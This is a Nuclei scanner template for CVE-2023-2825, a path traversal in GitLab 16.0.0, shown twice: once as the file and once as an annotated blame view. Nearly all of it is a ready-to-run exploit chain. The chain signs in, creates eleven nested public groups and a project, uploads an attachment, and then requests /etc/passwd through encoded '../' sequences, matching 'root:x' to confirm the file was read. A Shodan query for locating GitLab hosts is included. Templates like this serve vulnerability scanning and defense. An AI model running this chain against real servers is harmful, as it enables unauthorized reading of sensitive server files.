nuclei-templates/http/cves/2023/CVE-2023-2825.yaml

id: CVE-2023-2825

info:
  name: GitLab 16.0.0 - Path Traversal
  author: DhiyaneshDk,rootxharsh,iamnoooob,pdresearch
  severity: critical
  description: |
    An issue has been discovered in GitLab CE/EE affecting only version 16.0.0. An unauthenticated malicious user can use a path traversal vulnerability to read arbitrary files on the server when an attachment exists in a public project nested within at least five groups
  reference:
    - https://about.gitlab.com/releases/2023/05/23/critical-security-release-gitlab-16-0-1-released/
    - https://github.com/Occamsec/CVE-2023-2825
    - https://labs.watchtowr.com/gitlab-arbitrary-file-read-gitlab-cve-2023-2825-analysis/
    - https://nvd.nist.gov/vuln/detail/CVE-2023-2825
  classification:
    cve-id: CVE-2023-2825
  metadata:
    max-request: 16
    shodan-query: title:"Gitlab"
    verified: true
  tags: cve,cve2023,gitlab,lfi,kev,authenticated

variables:
  data: '{{rand_base(5)}}'

http:
  - raw:
      - |
        GET /users/sign_in HTTP/1.1
        Host: {{Hostname}}

      - |
        POST /users/sign_in HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Accept: */*

        user%5Blogin%5D={{username}}&user%5Bpassword%5D={{password}}&authenticity_token={{token_1}}

      - |
        POST /groups HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Accept: */*

        group%5Bparent_id%5D=&group%5Bname%5D={{data}}-1&group%5Bpath%5D={{data}}-1&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}

      - |
        POST /groups HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        Content-Type: application/x-www-form-urlencoded

        group%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-2&group%5Bpath%5D={{data}}-2&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}

      - |
        POST /groups HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        Content-Type: application/x-www-form-urlencoded

        group%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-3&group%5Bpath%5D={{data}}-3&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}

      - |
        POST /groups HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        Content-Type: application/x-www-form-urlencoded

        group%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-4&group%5Bpath%5D={{data}}-4&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}

      - |
        POST /groups HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        Content-Type: application/x-www-form-urlencoded

        group%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-5&group%5Bpath%5D={{data}}-5&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}

      - |
        POST /groups HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        Content-Type: application/x-www-form-urlencoded

        group%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-6&group%5Bpath%5D={{data}}-6&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}

      - |
        POST /groups HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        Content-Type: application/x-www-form-urlencoded

        group%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-7&group%5Bpath%5D={{data}}-7&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}

      - |
        POST /groups HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        Content-Type: application/x-www-form-urlencoded

        group%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-8&group%5Bpath%5D={{data}}-8&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}

      - |
        POST /groups HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        Content-Type: application/x-www-form-urlencoded

        group%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-9&group%5Bpath%5D={{data}}-9&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}

      - |
        POST /groups HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        Content-Type: application/x-www-form-urlencoded

        group%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-10&group%5Bpath%5D={{data}}-10&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}

      - |
        POST /groups HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        Content-Type: application/x-www-form-urlencoded

        group%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-11&group%5Bpath%5D={{data}}-11&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}

      - |
        @timeout: 15s
        POST /projects HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        Content-Type: application/x-www-form-urlencoded

        project%5Bci_cd_only%5D=false&project%5Bname%5D=CVE-2023-2825&project%5Bselected_namespace_id%5D={{namespace_id}}&project%5Bnamespace_id%5D={{namespace_id}}&project%5Bpath%5D=CVE-2023-2825&project%5Bvisibility_level%5D=20&project%5Binitialize_with_readme=1&authenticity_token={{token_2}}

      - |
        POST /{{data}}-1/{{data}}-2/{{data}}-3/{{data}}-4/{{data}}-5/{{data}}-6/{{data}}-7/{{data}}-8/{{data}}-9/{{data}}-10/{{data}}-11/CVE-2023-2825/uploads HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        X-CSRF-Token: {{x-csrf-token}}
        Content-Type: multipart/form-data; boundary=0ce2a9fbe06b6da89c138a35a1765ed6

        --0ce2a9fbe06b6da89c138a35a1765ed6
        Content-Disposition: form-data; name="file"; filename="{{randstr}}"

        {{randstr}}
        --0ce2a9fbe06b6da89c138a35a1765ed6--

      - |
        GET /{{data}}-1/{{data}}-2/{{data}}-3/{{data}}-4/{{data}}-5/{{data}}-6/{{data}}-7/{{data}}-8/{{data}}-9/{{data}}-10/{{data}}-11/CVE-2023-2825/uploads/{{upload-hash}}/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
        Host: {{Hostname}}
        Accept: */*

    host-redirects: true
    cookie-reuse: true
    extractors:
      - type: regex
        part: body
        name: token_1
        group: 1
        regex:
          - 'name="authenticity_token" value="([A-Za-z0-9_-]+)"'
        internal: true

      - type: regex
        part: body
        name: token_2
        group: 1
        regex:
          - 'name="csrf\-token" content="([A-Z_0-9a-z-]+)"'
        internal: true

      - type: regex
        part: body
        name: parent_id
        group: 1
        regex:
          - 'href="\/groups\/new\?parent_id=([0-9]+)'
        internal: true

      - type: regex
        part: body
        name: namespace_id
        group: 1
        regex:
          - 'ref="\/projects\/new\?namespace_id=([0-9]+)'
        internal: true

      - type: regex
        part: body
        name: x-csrf-token
        group: 1
        regex:
          - 'const headers = \{"X\-CSRF\-Token":"([a-zA-Z-0-9_]+)"'
        internal: true

      - type: regex
        part: body
        name: upload-hash
        group: 1
        regex:
          - '"url":"\/uploads\/([0-9a-z]+)\/'
        internal: true

    matchers-condition: and
    matchers:
      - type: word
        encoding: hex
        words:
          - "726f6f743a78"

      - type: word
        part: header
        words:
          - "application/octet-stream"
          - "etc%2Fpasswd"
        condition: and
Create CVE-2023-2825.yaml 2023-05-29 08:36:11 +00:00			`id: CVE-2023-2825`

			`info:`
updated info 2023-05-29 18:01:22 +00:00			`name: GitLab 16.0.0 - Path Traversal`
Create CVE-2023-2825.yaml 2023-05-29 08:36:11 +00:00			`author: DhiyaneshDk,rootxharsh,iamnoooob,pdresearch`
			`severity: critical`
			`description: \|`
			`An issue has been discovered in GitLab CE/EE affecting only version 16.0.0. An unauthenticated malicious user can use a path traversal vulnerability to read arbitrary files on the server when an attachment exists in a public project nested within at least five groups`
			`reference:`
			`- https://about.gitlab.com/releases/2023/05/23/critical-security-release-gitlab-16-0-1-released/`
			`- https://github.com/Occamsec/CVE-2023-2825`
			`- https://labs.watchtowr.com/gitlab-arbitrary-file-read-gitlab-cve-2023-2825-analysis/`
updated info 2023-05-29 18:01:22 +00:00			`- https://nvd.nist.gov/vuln/detail/CVE-2023-2825`
			`classification:`
			`cve-id: CVE-2023-2825`
Create CVE-2023-2825.yaml 2023-05-29 08:36:11 +00:00			`metadata:`
Auto Generated CVE annotations [Sat Jun 3 18:56:35 UTC 2023] :robot: 2023-06-03 18:56:35 +00:00			`max-request: 16`
Create CVE-2023-2825.yaml 2023-05-29 08:36:11 +00:00			`shodan-query: title:"Gitlab"`
boolean format update 2023-06-04 08:13:42 +00:00			`verified: true`
Create CVE-2023-2825.yaml 2023-05-29 08:36:11 +00:00			`tags: cve,cve2023,gitlab,lfi,kev,authenticated`

			`variables:`
			`data: '{{rand_base(5)}}'`

			`http:`
			`- raw:`
			`- \|`
			`GET /users/sign_in HTTP/1.1`
			`Host: {{Hostname}}`

			`- \|`
			`POST /users/sign_in HTTP/1.1`
			`Host: {{Hostname}}`
			`Content-Type: application/x-www-form-urlencoded`
			`Accept: /`

			`user%5Blogin%5D={{username}}&user%5Bpassword%5D={{password}}&authenticity_token={{token_1}}`

			`- \|`
			`POST /groups HTTP/1.1`
			`Host: {{Hostname}}`
			`Content-Type: application/x-www-form-urlencoded`
			`Accept: /`

			`group%5Bparent_id%5D=&group%5Bname%5D={{data}}-1&group%5Bpath%5D={{data}}-1&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}`

			`- \|`
			`POST /groups HTTP/1.1`
			`Host: {{Hostname}}`
			`Accept: /`
			`Content-Type: application/x-www-form-urlencoded`

			`group%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-2&group%5Bpath%5D={{data}}-2&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}`

			`- \|`
			`POST /groups HTTP/1.1`
			`Host: {{Hostname}}`
			`Accept: /`
			`Content-Type: application/x-www-form-urlencoded`

			`group%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-3&group%5Bpath%5D={{data}}-3&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}`

			`- \|`
			`POST /groups HTTP/1.1`
			`Host: {{Hostname}}`
			`Accept: /`
			`Content-Type: application/x-www-form-urlencoded`

			`group%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-4&group%5Bpath%5D={{data}}-4&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}`

			`- \|`
			`POST /groups HTTP/1.1`
			`Host: {{Hostname}}`
			`Accept: /`
			`Content-Type: application/x-www-form-urlencoded`

			`group%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-5&group%5Bpath%5D={{data}}-5&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}`

			`- \|`
			`POST /groups HTTP/1.1`
			`Host: {{Hostname}}`
			`Accept: /`
			`Content-Type: application/x-www-form-urlencoded`

			`group%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-6&group%5Bpath%5D={{data}}-6&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}`

			`- \|`
			`POST /groups HTTP/1.1`
			`Host: {{Hostname}}`
			`Accept: /`
			`Content-Type: application/x-www-form-urlencoded`

			`group%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-7&group%5Bpath%5D={{data}}-7&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}`

			`- \|`
			`POST /groups HTTP/1.1`
			`Host: {{Hostname}}`
			`Accept: /`
			`Content-Type: application/x-www-form-urlencoded`

			`group%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-8&group%5Bpath%5D={{data}}-8&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}`

			`- \|`
			`POST /groups HTTP/1.1`
			`Host: {{Hostname}}`
			`Accept: /`
			`Content-Type: application/x-www-form-urlencoded`

			`group%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-9&group%5Bpath%5D={{data}}-9&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}`

			`- \|`
			`POST /groups HTTP/1.1`
			`Host: {{Hostname}}`
			`Accept: /`
			`Content-Type: application/x-www-form-urlencoded`

			`group%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-10&group%5Bpath%5D={{data}}-10&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}`

			`- \|`
			`POST /groups HTTP/1.1`
			`Host: {{Hostname}}`
			`Accept: /`
			`Content-Type: application/x-www-form-urlencoded`

			`group%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-11&group%5Bpath%5D={{data}}-11&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}`

			`- \|`
			`@timeout: 15s`
			`POST /projects HTTP/1.1`
			`Host: {{Hostname}}`
			`Accept: /`
			`Content-Type: application/x-www-form-urlencoded`

			`project%5Bci_cd_only%5D=false&project%5Bname%5D=CVE-2023-2825&project%5Bselected_namespace_id%5D={{namespace_id}}&project%5Bnamespace_id%5D={{namespace_id}}&project%5Bpath%5D=CVE-2023-2825&project%5Bvisibility_level%5D=20&project%5Binitialize_with_readme=1&authenticity_token={{token_2}}`

			`- \|`
			`POST /{{data}}-1/{{data}}-2/{{data}}-3/{{data}}-4/{{data}}-5/{{data}}-6/{{data}}-7/{{data}}-8/{{data}}-9/{{data}}-10/{{data}}-11/CVE-2023-2825/uploads HTTP/1.1`
			`Host: {{Hostname}}`
			`Accept: /`
			`X-CSRF-Token: {{x-csrf-token}}`
			`Content-Type: multipart/form-data; boundary=0ce2a9fbe06b6da89c138a35a1765ed6`

			`--0ce2a9fbe06b6da89c138a35a1765ed6`
			`Content-Disposition: form-data; name="file"; filename="{{randstr}}"`

			`{{randstr}}`
			`--0ce2a9fbe06b6da89c138a35a1765ed6--`

			`- \|`
			`GET /{{data}}-1/{{data}}-2/{{data}}-3/{{data}}-4/{{data}}-5/{{data}}-6/{{data}}-7/{{data}}-8/{{data}}-9/{{data}}-10/{{data}}-11/CVE-2023-2825/uploads/{{upload-hash}}/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1`
			`Host: {{Hostname}}`
			`Accept: /`

			`host-redirects: true`
			`cookie-reuse: true`
			`extractors:`
			`- type: regex`
			`part: body`
			`name: token_1`
			`group: 1`
			`regex:`
			`- 'name="authenticity_token" value="([A-Za-z0-9_-]+)"'`
			`internal: true`

			`- type: regex`
			`part: body`
			`name: token_2`
			`group: 1`
			`regex:`
			`- 'name="csrf\-token" content="([A-Z_0-9a-z-]+)"'`
			`internal: true`

			`- type: regex`
			`part: body`
			`name: parent_id`
			`group: 1`
			`regex:`
			`- 'href="\/groups\/new\?parent_id=([0-9]+)'`
			`internal: true`

			`- type: regex`
			`part: body`
			`name: namespace_id`
			`group: 1`
			`regex:`
			`- 'ref="\/projects\/new\?namespace_id=([0-9]+)'`
			`internal: true`

			`- type: regex`
			`part: body`
			`name: x-csrf-token`
			`group: 1`
			`regex:`
			`- 'const headers = \{"X\-CSRF\-Token":"([a-zA-Z-0-9_]+)"'`
			`internal: true`

			`- type: regex`
			`part: body`
			`name: upload-hash`
			`group: 1`
			`regex:`
			`- '"url":"\/uploads\/([0-9a-z]+)\/'`
			`internal: true`

			`matchers-condition: and`
			`matchers:`
			`- type: word`
			`encoding: hex`
			`words:`
			`- "726f6f743a78"`

			`- type: word`
			`part: header`
			`words:`
			`- "application/octet-stream"`
			`- "etc%2Fpasswd"`
			`condition: and`